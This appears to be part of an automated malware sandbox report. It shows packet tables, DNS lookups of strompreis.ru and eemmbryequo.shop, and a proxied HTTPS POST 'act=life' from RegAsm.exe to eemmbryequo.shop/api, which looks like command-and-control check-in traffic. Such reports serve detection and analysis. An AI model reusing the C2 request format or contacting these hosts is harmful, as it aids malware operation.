Sep 19, 2024 02:38:51.975862980 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975928068 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.975938082 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.975984097 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.976116896 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.976227999 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.976361990 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.976478100 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.976537943 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.976587057 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.976700068 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.976768017 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.976800919 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.976911068 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.976960897 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.977016926 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977117062 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977195024 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.977230072 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977338076 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977446079 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977467060 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.977555990 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977662086 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977689981 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.977763891 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977844954 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.977864027 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.977967978 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978025913 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.978080988 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978168011 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978230953 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978230000 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.978296995 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978373051 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978434086 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978502989 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.978504896 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978549957 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.978568077 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978631020 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978705883 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978761911 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978827953 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.978835106 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978899002 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978954077 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.978960037 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979026079 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979082108 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979089022 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979140043 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979192972 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979209900 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979266882 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979330063 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979378939 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979393959 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979422092 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979451895 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979525089 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979571104 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979587078 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979650021 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979688883 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979721069 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979783058 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979827881 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.979856014 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979922056 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.979983091 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980024099 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.980053902 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980084896 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.980117083 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980214119 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980273962 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.980315924 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980391979 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.980392933 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980457067 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980525970 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980560064 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.980592966 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980655909 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980719090 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.980726004 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980782986 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980839968 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980859041 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.980911016 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.980967045 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981021881 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981034040 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981070995 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981112003 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981173038 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981228113 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981261015 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981323957 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981348991 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981393099 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981452942 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981512070 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981581926 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981606960 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981645107 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981683016 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981715918 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981792927 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981794119 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981851101 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981898069 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.981923103 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.981986046 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982053995 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982067108 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.982121944 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982160091 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.982182026 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982251883 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982310057 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982342958 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.982369900 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982470989 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982511997 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982538939 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.982559919 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982609987 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982647896 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982685089 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982716084 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.982733011 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982779026 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982815027 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982825041 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.982851028 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982896090 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982944965 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.982981920 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.983017921 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.983059883 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.983102083 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.983140945 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.983177900 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:51.983196974 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.983325005 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.983444929 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:51.986927032 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:52.217694998 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:52.217941046 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:52.409962893 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:52.410283089 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:54.599586010 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:54.918297052 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:54.918488026 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:55.208489895 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:55.255428076 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:55.430716991 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:55.432828903 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:55.827758074 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:55.827997923 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:56.125286102 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:57.200409889 CEST	49783	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:57.375889063 CEST	56001	49783	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:02.836608887 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:02.836627007 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:02.836843014 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:02.837527990 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:02.837538004 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.061585903 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.062484980 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.064011097 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.064057112 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.064785957 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.090095997 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.090095997 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.090415955 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.280675888 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.280893087 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.281054974 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.281090975 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.281132936 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.281399012 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.281457901 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.281721115 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.281881094 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.282663107 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.282663107 CEST	49784	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.282757044 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.282778025 CEST	443	49784	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.372051001 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.372076988 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.372353077 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.372476101 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.372497082 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.569077015 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.569353104 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.570269108 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.570281029 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.570566893 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:03.571743965 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.571743965 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:03.571846008 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:04.111069918 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:04.111424923 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:04.111640930 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:04.111730099 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:04.111730099 CEST	49785	443	192.168.11.20	172.67.142.26
Sep 19, 2024 02:39:04.111778975 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:04.111797094 CEST	443	49785	172.67.142.26	192.168.11.20
Sep 19, 2024 02:39:25.610234022 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:26.014489889 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:26.014699936 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:26.200263977 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:26.248675108 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:26.425762892 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:26.426959991 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:26.827399015 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:26.827563047 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:27.123648882 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:51.633913040 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:52.014273882 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:52.014444113 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:52.202043056 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:52.243010044 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:52.439410925 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:52.440079927 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:52.833466053 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:39:52.833673000 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:39:53.123742104 CEST	56001	49782	45.11.229.96	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:37:51.375324965 CEST	50040	53	192.168.11.20	1.1.1.1
Sep 19, 2024 02:37:51.658976078 CEST	53	50040	1.1.1.1	192.168.11.20
Sep 19, 2024 02:39:02.730226994 CEST	57305	53	192.168.11.20	1.1.1.1
Sep 19, 2024 02:39:02.833192110 CEST	53	57305	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 19, 2024 02:37:51.375324965 CEST	192.168.11.20	1.1.1.1	0x1e3c	Standard query (0)	strompreis.ru	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:39:02.730226994 CEST	192.168.11.20	1.1.1.1	0x2759	Standard query (0)	eemmbryequo.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 19, 2024 02:37:51.658976078 CEST	1.1.1.1	192.168.11.20	0x1e3c	No error (0)	strompreis.ru	45.11.229.96	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:39:02.833192110 CEST	1.1.1.1	192.168.11.20	0x2759	No error (0)	eemmbryequo.shop	172.67.142.26	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:39:02.833192110 CEST	1.1.1.1	192.168.11.20	0x2759	No error (0)	eemmbryequo.shop	104.21.39.11	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

eemmbryequo.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49784	172.67.142.26	443	7340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:39:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: eemmbryequo.shop
2024-09-19 00:39:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-19 00:39:03 UTC	543	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:39:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D2zajNkIWlV6UlhtLfgUPdZZLWthBBLyCR2m1i7gGofuF%2FP%2FoemsGUO7NA8XRkH6Wq4VheR0j1LsN8KhYSmErjbPsIa0VVFc6NQ7v0gxNC6JcPrEGR1rz21N0mIju08kFBg0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c5584352e50199d-EWR
2024-09-19 00:39:03 UTC	826	IN	Data Raw: 31 31 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1130<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-19 00:39:03 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-09-19 00:39:03 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 30 66 63 4c 59 53 63 36 59 73 69 4b 6f 41 59 77 6d 4a 6d 63 4d 46 43 4b 79 48 68 52 45 61 71 39 43 6b 31 5f 30 72 6d 65 43 35 38 2d 31 37 32 36 37 30 36 33 34 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 Data Ascii: <input type="hidden" name="atok" value="0fcLYSc6YsiKoAYwmJmcMFCKyHhREaq9Ck1_0rmeC58-1726706343-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="bac
2024-09-19 00:39:03 UTC	844	IN	Data Raw: 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 